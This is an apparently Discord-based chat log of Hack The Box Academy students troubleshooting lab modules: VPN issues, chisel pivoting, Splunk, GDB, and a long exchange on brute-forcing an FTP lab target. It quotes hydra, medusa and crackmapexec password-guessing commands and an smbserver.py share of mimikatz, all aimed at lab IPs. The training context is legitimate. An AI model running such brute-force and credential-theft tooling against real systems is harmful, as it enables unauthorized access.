many issues are dumb user error, that i've done too

Here is a guide for using chisel https://forum.hackthebox.com/t/attacking-enterprise-networks-double-pivot-using-chisel/267043

chisel saved my a$$ many times 😄

its weird because it works until i log-in

EU vpn ?

y

change to us and try

udp

ok

solved my problems for today

it works

i had to wait for like 1 minute to let the page show but it works ahahha

please report this issue

@fathom pendant fix that

?

i'm not staff lol

shit just happens

wtf

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

done 👍

still didnt find a way to execute that correctly

try harder

bruh

cmon bro

dont be a pussy

lmao im trying

don't be a dick lol

???

Hey guys, a quick question. I'm at "Information Gathering - Active Subdomain Enumeration" and at the end of that module you can see the explanation of how to use gobuster. What I don't get is that if you don't have permission of using that tool on a specific domain, you shouldn't do it. Then why the examples of gobuster are with facebook.com?

https://hackerone.com/meta/policy_scopes?type=team

https://academy.hackthebox.com/module/143/section/1276 , lol the questions are totally misleading 🙂

But do you need to have an account or do they let anyone look for vulnerabilities?

if its subdomain enum i think anyone can do it

Hello
So i was doing the LFI module on HTB academy and i am stuck in a question which expects a flag as an answer. It tells me the location of the flag, i try to transverse and i get a flag with the format HTB{} but when i submit the flag its showing incorrect answer

any help is appreciated pls do ping me while replying

make sure no weird extra spaces

ye i did

nvrmind i worked space was the issue

thx

damn AD module is huge 🙂

Repent of your sins and turn to God, for the kingdom of heaven is near. For God so loved the world that he gave his one and only Son, that whoever believes in him shall not perish but have eternal life.

great

i am still stuck 😦

no

where do i go for help on openvpn i am trying to connect to hack the box vip machines i am using a vip vpn but it says destination host unreachable when i ping

when you connect to the vpn; do you have initialization sequence completed? If so: open a new terminal; sometimes pings will fail if the box is configured to not accept them

nmap as the -Pn flag

yeah ive got that ive done the whole htb cpts course so familar with vpns already, but ive tried multiple machines doesnt work soon as i try a free machine works fine

¯_(ツ)_/¯

make sure you're on the right vpn if you're doing the labs platform

also read #welcome to find out how to acess more of the server

It does say it'll take 7 days & that's with HTB's optimistic time frames

the thing is they are easy af at the start so u think it wont take long then half way through it just gets way more difficult

real

It's never the skill assessments that I waste time on either it's always some random sections exercise that gets me lol

fact bro and its usually something stupid as hell i think it was the port forwarding module basically the flag wouldnt open up in the browser unless u closed all the tabs first i was on it for like 3 days some bs

I'm currently doing pivoting and I haven't had that happen to me, I'll keep a lookout for something like that

For module Understanding Log Sources & Investigating With Splunk, section Introduction to Splunk & SPL, third question
Why is the answer ||not waldo||? The query I used shows them as the one with the most login attempts within 10 minutes

Hey all, I'm doing the Intro to AD module and having trouble connecting with xfreerdp. Everytime I try to connect with the pwnbox, I get this return:
[18:29:26:557] [3091:3092] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[18:29:26:559] [3091:3091] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]

Anyone know what this is about?

Is there anyone who could help me with the ftp attack module? please, I'm going crazy

It seems like there might be an issue with the connection timing out. Check your network connectivity, and ensure that the server you're trying to connect to is reachable. You may also want to verify the correctness of the connection parameters such as the server address and credentials. If the issue persists, consult the documentation for xfreerdp or seek assistance from your course instructor or technical support.

please help me..

did you mean Files Transfer Protocol

ftp attacks modiule?

yes,

Hi everyone,
I'm doing Misc CSRF Exploitation in the ADVANCED XSS AND CSRF EXPLOITATION module and when I log in into the vulnerable app, I immediately got logged out and there is no ||Promote button||, does anybody know should it work like that?

because gobuster prob got perms to show facebook as example

i cant resolve the 2* answear

or it just didnt care enough

I used:

hydra -l robin -P /home/kali/Desktop/wordlists/rockyou.txt ftp://10.129.203.6

medusa -u robin -P /home/kali/Desktop/pws/pws.list -h 10.129.203.6 -M ftp -n 2121 -t 30 -f

crackmapexec ftp $10.129.233.82 -u robin -p ./home/kali/Desktop/pws/pws.txt --port 2121

but none produce any results

u mean attacking common services

yes, discors prevents me from sending the link, anyway yes, I am referring to the ''attack on common services'' module, in particular ftp attack

okay give me a sec

the question tells me: Use the discovered username with its password to login via SSH and obtain the flag.txt file. Submit the contents as your answer.
but using medusa, hydra and crackmapexec I can't find any password

you can absolutely send links to the module/section you're on

https://academy.hackthebox.com/module/116/section/1165

one moment i have done this module but i dint take many notes so im just starting it up again

hydra should work with ftp

are you using the mutated password list

the form among the resources gave me a file with passwords

nothing, it is so frustrating

oh wait

this is the acs one

hydra should work tbh

hello there, anyone willing help with the Slack cookie part of Pillaging section of Windows PrivEsc?, cuz the process described into the section is not working for me on my PC as Lab either...

If you're having trouble, consider checking the following:
Verify the target IP address and port.
Confirm the validity of your username and password lists.
Ensure that the FTP service is running on the specified port.
Check if there are any firewalls or security measures in place that could block your connection attempts.

the error is that the connections are getting dropped btw

how i can resolve?

it would be awkward if ftp wasn't running on the section regarding ftp

reset the target, see if you can ping it

also why ae you doing ftp $10.129.233.82 i've never seen an ip with a $ in front of it

via this forum: https://forum.hackthebox.com/t/academy-attacking-common-services-attacking-ftp/257166
I have noticed that many have had some problems of this type, that is, they have to reset the target several times

however if I scan with nmap, nmap gives me some results

and

i think you may need to specify port with -s for hydra instead of ftp://ip:port

now i try

Im working on the password mutations section of the password attacks module and trying to solve this question. Ive generated a custom wordlist using the resources provided but trying to use crackmapexec like I have for the other sections is going incredibly slow. I'm lead to believe I should get the ssh hash and put it into john but I dont know how to do so

don't attack ssh

look for other running services

I was running crackmapexec on the ftp server as well but it was also going slow, do I need to just let it run for a long time?

Doesn't this command "sudo smbserver.py -smb2support CompData /usr/share/mimikatz/Win32
" create a share called 'CompData'?

additionally is there any way to speed it up? I modified the threads to 1000 but that didn't seem to help anything

chatgpt ahhh response

I ask because I am unable to locate it on my machine

is it working correctly?

yes it's running

though i would have suggested using the smaller pws.txt file

because uhhhh rockyou is gonna take a minute

generally rockyou isn't gonna be used for Bruteforce as it's a HUGE list

i dont knwo what to do

the pws list with both medusa and hydra doesn't give me any kind of result

weird

I know that I find out the password via either medusa or hydra, with the ''pws'' wordlist that they gave me from the module, but neither of the two tools works, or rather, neither of the two gives me the password

too weird, what can I do in this case?

did you check anonymous logins?

you forgot to specify port

ftp -ip:2121?

ftp ip 2121

no colon

it asks me for the password

anonymous login

can you be more clear?

user ...

you didn't wait for it to prompt you to enter a username

u need to login as anonymous

then list for files

u will find a wordlist

that too, but dude didn't wait for ftp to prompt for username

so ftp took the error code of trying to ls as the username

which is actually funny

where it says name u need to put anonymous u typed ls as the username

it wasn't even that

literally he typed ls before ftp sent the login response

ik cuz i did the same

u have to wait for the name thing to appear

so the error code that came up 331 Password required for ls was taken as the login username

so now I have to write anonymous?

yes

yup

why are you suspending processes btw

just close or quit them

just hit enter

"Anonymous login ok" > this part means you can literally log in as anon

and use anything as your password, it doesn't do any kinda email verification check

ok now I'm logged in, can you please tell me the wget command to download everything?

wget isn't an ftp command

help can be the answer

ok this thing is very important for me, as I hadn't grasped this thing which is very subtle

thank youi marciel

it's covered in the Footprinting Module btw

if you're doing the CPTS path; please do them in order lol

PLEASE 🙂

and even then Footprinting is a pre-req for Attacking Common Service

as it covers basic recon for these services

Now I'll go ahead on my own to understand how to download the files, you've been a great help Marciel, thank you very much

np

it should take ~ 1 minute with your newfound list to get the answer

:)

is running crackmapexec on the ftp server the right direction?

Intro to Assembly Language
Debugging with GDB

Download the attached file, and find the hex value in 'rax' when we reach the instruction at <_start+16>?

I'm running the code then doing this
|| gef➤ x/wx 0x401010
0x401010 <_start+16>: 0x00bf0000 ||

But it doesn't seem to be the answer

I'm not sure to understand

it can be

on or against ?

unfortunately here we are, why does it say permission denied?

do you have permission to write to where you're downloading to?

i.e. are you in a root-protected directory

also: passowrd.list

you typoed

I can not do anything? what should I do now?

should I use hydra from here?

no..

i meant: from the directory you launched ftp from

i.e. / or /root/ i cannot recall if /home/ is

/home

just type cd or cd ~ to get to your user's home directory

then try downloading again

/home/ is where the users are and is (in-fact) a root protected directory

I don't know if I didn't understand anything, or I'm not able to download these files

you need to exit ftp before changing your working directory

i dont understand

I don't understand what changing the folder on my Kali has to do with the fact that ftp prevents me from downloading the files

why can't I download the files?

I then ran these two commands on my Windows machine :

net use \10.10.15.20\CompData

cd windows
PS C:\windows> mkdir temp
PS C:\windows> dir

copy /CompData /windows/temp/

Did not see the mimikatz folder copied to my windows machine

generally in linux you will have a root directory containing every file on the system. this directory is owned by root and every user must abide by its permissions placed on this folder. from where you did your ftp command is this folder.

root can read, write, and execute all files within the root dir. all other users can only read files. you, the kali user, can only read files. you are attempting to download (write) a file to that directory, which is not possible because of the permissions.

so do I have to run the command from root?

probailly it works

perhaps, but you can just move to a directory where you do have the permissions to write files to it, e.g., your user's home directory

this is a really strange thing, I discovered the world, that is, I didn't know that based on how you log in, whether as root or as a normal user, ftp recognized this thing

does someone has used metasploit for the "Other Notable Applications" in the "attacking common application" and can help me to configure it because i got "Exploit completed, but no session was created" and i think its because of the payload ! but there is more than 200 payloads for the exploit

he downloaded it for me, it worked

do someone can help me on that

you shouldn't need to use root unless you have to

marcie was trying to tell you to change your working directory as the kali user, not to use root

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

anyone faced an issue that when rebooting splunk, it never goes up again!

Hello, kind fellows of HTB.
I come yet with another issue:

Pivoting, Tunneling and Port Forwarding Module.
SOCKS5 Tunneling with chisel.
Can someone tell me what am I supposed to do? Do I have to install the library on the target host? (worst case scenario, if I can't fix it on my kali I will just use pwnbox).

but I would recommend ligolo, it is way easier in my opinion

See, the task is to use chisel.

I downloaded it, built a binary and transferred it via scp to the target host.

sorry I was wrong it is server on pivot & client on host my bad

better dl the binary